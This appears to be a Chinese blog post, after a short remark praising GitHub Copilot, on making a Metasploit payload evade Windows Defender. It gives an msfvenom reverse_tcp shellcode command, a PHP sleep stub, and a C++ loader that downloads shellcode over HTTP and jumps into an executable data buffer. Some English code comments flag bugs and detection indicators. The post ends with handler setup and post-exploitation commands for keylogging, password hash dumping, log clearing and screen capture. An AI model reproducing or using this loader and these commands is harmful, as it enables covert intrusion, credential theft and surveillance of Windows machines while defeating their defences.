不得不说,用了两个月,https://copilot.github.com/  GitHub Copilot这玩意神了,原来nlp技术现在已经到这种地步了,基本等于超越时代版代码提示,和编辑器默认版比就是小灵通和安卓手机的区别,国外把nlp技术应用到有实际意义的工作和科研环境中,比如提高工作效率的工具上,国内把nlp技术应用到监管层的内容安全审查上….

Metasploit免杀过Defender

本地环境: windows11专业版 vs2022 c++14

远程环境: ubuntu20 web环境: apache2 php7

微软的Defender过,持续静默执行,不太敏感的操作,基本发现不了,截个图 读读文件列列目录是没毛病,其他的渣渣杀软也没太大压力。

思路: exe和shellcode分离,远程加载shellcode

msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 7 \b '\x00' LHOST=192.0.0.1 LPORT=3331 -f raw > test1.txt

执行逻辑,把shellcode保存进test1.txt,test1.txt放在web目录,通过c++ https远程读取并执行,期间通过c++ https访问,服务端php 进行强制sleep绕过动态查杀

<?php
    // Server side of the staging scheme described above: the response is held
    // for 20 seconds before the (empty) body is returned. For defenders, a client
    // that blocks this long on a tiny HTTP response before doing anything else is
    // itself a behavioural signal worth correlating with the later fetches.
    sleep(20);
?>

vs2022编译执行,关闭DEP(数据执行保护),便于shellcode远程加载执行。

#pragma warning( disable : 4996)
#include <string>
#include <windows.h>
#include <winhttp.h>
#include<iostream>
#pragma comment(lib, "winhttp.lib")
// Marks the .data section readable+writable+executable so that main() can jump into
// the global buffer pp1 below. A W+X data section in the PE section table is a cheap
// static indicator: legitimate MSVC builds essentially never ship one.
#pragma comment(linker, "/section:.data,RWE")
// GUI subsystem with the console CRT entry point: the process gets no console window,
// so all the std::cout output below is effectively discarded.
#pragma comment( linker, "/subsystem:windows /entry:mainCRTStartup" )


using namespace std;
// Destination for the bytes downloaded in main(); control is transferred into this
// array by the inline assembly there (hence the RWE pragma above).
unsigned char pp1[10000];
// Filler string; main() copies 800 bytes of it over `tree`, which is only 30 bytes.
char random_str[] = "aaa12#@$111#@$#@22222aaaa#@^&^^%&$%$#$#$#%$#%$11ass2$#%$#%$11ass2a大飒飒大撒大所大sasa1111111#!$#%$#%$11ass2asasa1111111#!$#%$#%$11ass2asasa1111111#!asasa1111111#!#[email protected]#[email protected]#";
// 30-byte array that main() overruns with an 800-byte memcpy (undefined behaviour).
char tree[30] = "adsdasasd";
/// Performs a plain-HTTP GET of `UrlPath` on `domain` (port 80, no WINHTTP_FLAG_SECURE)
/// and returns the LAST chunk that WinHttpReadData produced, as a heap buffer the caller
/// would have to delete[]. Earlier chunks are overwritten and leaked, and the session,
/// connect and request handles are never closed, so every call leaks all three.
/// Any failure before the read loop terminates the process with exit(0); a read-loop
/// failure only breaks out and returns whatever buffer was last allocated (possibly NULL).
/// Defender note: the request is cleartext and carries the literal User-Agent
/// "WinHTTP Example/1.0", so it is fully visible to proxy / network inspection.
/// @param domain  host name (wide string), used as-is by WinHttpConnect
/// @param UrlPath path+query (wide string) passed to WinHttpOpenRequest
/// @return pointer to the last zero-terminated chunk read, or NULL when nothing was read
LPSTR http_res(const wchar_t* domain, const wchar_t* UrlPath) {

	HINTERNET hSession = NULL;
	HINTERNET hConnect = NULL;
	HINTERNET hRequest = NULL;

	//1. Open a WinHTTP session; the first argument is the User-Agent the server sees.
	hSession = WinHttpOpen(L"WinHTTP Example/1.0",
		WINHTTP_ACCESS_TYPE_DEFAULT_PROXY,
		WINHTTP_NO_PROXY_NAME,
		WINHTTP_NO_PROXY_BYPASS, 0);

	if (hSession == NULL) {
		cout << "Error:Open session failed: " << GetLastError() << endl;
		exit(0);
	}

	//2. Connect to the server on INTERNET_DEFAULT_HTTP_PORT (80): this is unencrypted HTTP,
	//   despite the surrounding text calling it https. hConnect is non-NULL on success.
	hConnect = WinHttpConnect(hSession, domain, INTERNET_DEFAULT_HTTP_PORT, 0);
	if (hConnect == NULL) {
		cout << "Error:Connect failed: " << GetLastError() << endl;
		exit(0);
	}

	//3. Create the request handle used to send the GET and read the response.
	hRequest = WinHttpOpenRequest(hConnect, L"GET", UrlPath, NULL, WINHTTP_NO_REFERER, WINHTTP_DEFAULT_ACCEPT_TYPES, 0);

	if (hRequest == NULL) {
		cout << "Error:OpenRequest failed: " << GetLastError() << endl;
		exit(0);
	}

	BOOL bResults;
	bResults = WinHttpSendRequest(hRequest,
		WINHTTP_NO_ADDITIONAL_HEADERS,
		0, WINHTTP_NO_REQUEST_DATA, 0,
		0, 0);

	if (!bResults) {
		cout << "Error:SendRequest failed: " << GetLastError() << endl;
		exit(0);
	}
	else {
		//(3) Request sent: wait for the response. WinHttpReceiveResponse must complete before
		//    WinHttpQueryDataAvailable / WinHttpReadData can be used. Note this is also where the
		//    server-side sleep(20) is spent, so the call blocks for the whole delay.
		bResults = WinHttpReceiveResponse(hRequest, NULL);
	}


	LPVOID lpHeaderBuffer = NULL;   // unused
	DWORD dwSize = 0;
	//4-3. Read the response body chunk by chunk.
	LPSTR pszOutBuffer = NULL;
	DWORD dwDownloaded = 0;         // bytes actually received by the last WinHttpReadData
	wchar_t* pwText = NULL;         // unused
	if (bResults)
	{
		do
		{
			//(1) Ask how many bytes are currently available.
			dwSize = 0;
			if (!WinHttpQueryDataAvailable(hRequest, &dwSize)) {
				cout << "Error:WinHttpQueryDataAvailable failed:" << GetLastError() << endl;
				break;
			}
			if (!dwSize)    break;  // no more data

			//(2) Allocate a buffer for this chunk. Each iteration REPLACES pszOutBuffer, so the
			//    previous chunk is leaked and only the final chunk survives to the return below.
			//    (new[] throws on failure in C++, so the NULL check is effectively dead code.)
			pszOutBuffer = new char[dwSize + 1];
			if (!pszOutBuffer) {
				cout << "Out of memory." << endl;
				break;
			}
			ZeroMemory(pszOutBuffer, dwSize + 1);       // zero-fill so the chunk is NUL-terminated

			//(3) Read the chunk. (The error message names the wrong API; this is WinHttpReadData.)
			if (!WinHttpReadData(hRequest, pszOutBuffer, dwSize, &dwDownloaded)) {
				cout << "Error:WinHttpQueryDataAvailable failed:" << GetLastError() << endl;
			}
			if (!dwDownloaded)
				break;


		} while (dwSize > 0);


	}
	// Handles are intentionally (per the commented-out block in main) never closed.
	return pszOutBuffer;
}

/// Entry point: polls the web server forever. Each iteration fetches sleep.php twice
/// (the server holds each response for 20 s, see the PHP stub above), then test1.txt,
/// copies 800 bytes of the returned chunk into the global `pp1`, and jumps into that
/// buffer with MSVC x86 inline assembly. The `std::cout << &ccc` lines print the address
/// of the local pointer rather than the response text, and with /subsystem:windows the
/// console output is discarded anyway.
/// Defender note: the observable sequence is "long-latency HTTP GETs, then a jump from
/// the image's own .data section" — the W+X section plus execution from a non-image-code
/// region are the things memory scanners and ETW-based telemetry key on.
int main()
{	
	int a_num = 1;   // unused
	//char domain[] = "www.qq.comccccccccc";
	LPSTR ccc = http_res(L"www.guimaizi.com",L"/a/sleep.php?xx1dsdsdsadsa2asassa1312dsdsx4xxxaxx$2xxx");
	std::cout << "\nccc " << &ccc << std::endl;   // prints the address of `ccc`, not its contents
	while (true) {
		Sleep(6);
		LPSTR cccc = http_res(L"www.guimaizi.com", L"/a/sleep.php?xx1dsdsdsadsaasas2asassa1312dsdsx4xxxaxx$2xxx");
		std::cout << "\nccc " << &cccc << std::endl;
		// Fetch the payload file. http_res returns only the LAST chunk it read, or NULL when
		// nothing arrived; neither case is checked below.
		LPSTR aaa = http_res(L"www.guimaizi.com", L"/a/test1.txt?xx1d4dasa#$%$#%$#%3dsdsx4xxxaxx$2xxx");
		std::cout << "\naaa " << &aaa << std::endl;
		std::cout << "\naaa " << aaa << std::endl;
		// Writes 800 bytes into the 30-byte global `tree`: out-of-bounds write, undefined behaviour.
		memcpy(tree, random_str, 800);
		// Copies a fixed 800 bytes regardless of how much http_res actually returned
		// (over-read when the chunk is shorter, crash when aaa is NULL).
		memcpy(pp1, aaa, 800);
		Sleep(6);
		std::cout << "\ncccccc " << pp1 << std::endl;
		Sleep(6);
		// MSVC x86-only inline assembly (not accepted for x64 targets). The inc/mov ebx
		// instructions are filler: ebx is never read, so only `mov eax, offset pp1` and
		// `jmp eax` matter. Execution moves into the .data buffer; nothing after the jmp
		// in this block, nor the Sleep/cout below, is reached unless the code in pp1 returns.
		__asm
		{
			mov eax, offset pp1   // address of the downloaded bytes
			inc ebx
			inc ebx
			//inc ebx
			inc ebx
			mov ebx, 0322h
			inc ebx
			mov ebx, 0322h
			inc ebx
			mov ebx, 0012h
			inc ebx
			inc ebx
			inc ebx
			inc ebx
			jmp eax               // transfer control into pp1
			inc ebx               // unreachable from here on
			inc ebx
			//inc ebx
			inc ebx
			mov ebx, 0322h
			inc ebx
			inc ebx
			mov ebx, 0012h
			inc ebx
			inc ebx
			inc ebx
		}
		Sleep(6);
		std::cout << "pp1aaaaaaaaaaaa11aa: " << std::endl;
	}

	//5. Close request, connect and session handles in that order. Left commented out, and
	//   the handles are locals of http_res anyway, so in this build they are never released.
	//if (hRequest) WinHttpCloseHandle(hRequest);
	//if (hConnect) WinHttpCloseHandle(hConnect);
	//if (hSession) WinHttpCloseHandle(hSession);





}

msf server操作

use exploits/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.0.1
set lport 3331
set enablestageencoding true
set stageencoder x86/shikata_ga_nai
run

meterpreter下的命令

getwd 当前目录
dir 查看所有文件
cat c:\123.txt 查看文件123.txt内容(数据是字符串传递,所以加一个转义字符\)
search -f cmd.exe (搜索名为cmd.exe文件所在目录)
upload /root/桌面/backldoor.exe(要上传的文件) -> c:\(上传到的目录) 上传文件
download c:\123txt /root 下载文件
clearev 清除日志
getuid 当前用户
ps 查看所用进程
kill 杀死某个进程
sysinfo 系统信息

键盘记录
keyscan_start 开始键盘记录
keyscan_dump 查看结果
keyscan_stop

屏幕截图
screenshot

屏幕监控
run vnc

获取密文密码
hashdump

shell
获取shell,进入cmd

1.将自己暂时不用的会话放在后台
background

如何返回刚才的会话
sessions -l         //查看会话
sessions -i 1       //选择刚才的会话,数字‘1’视情况而定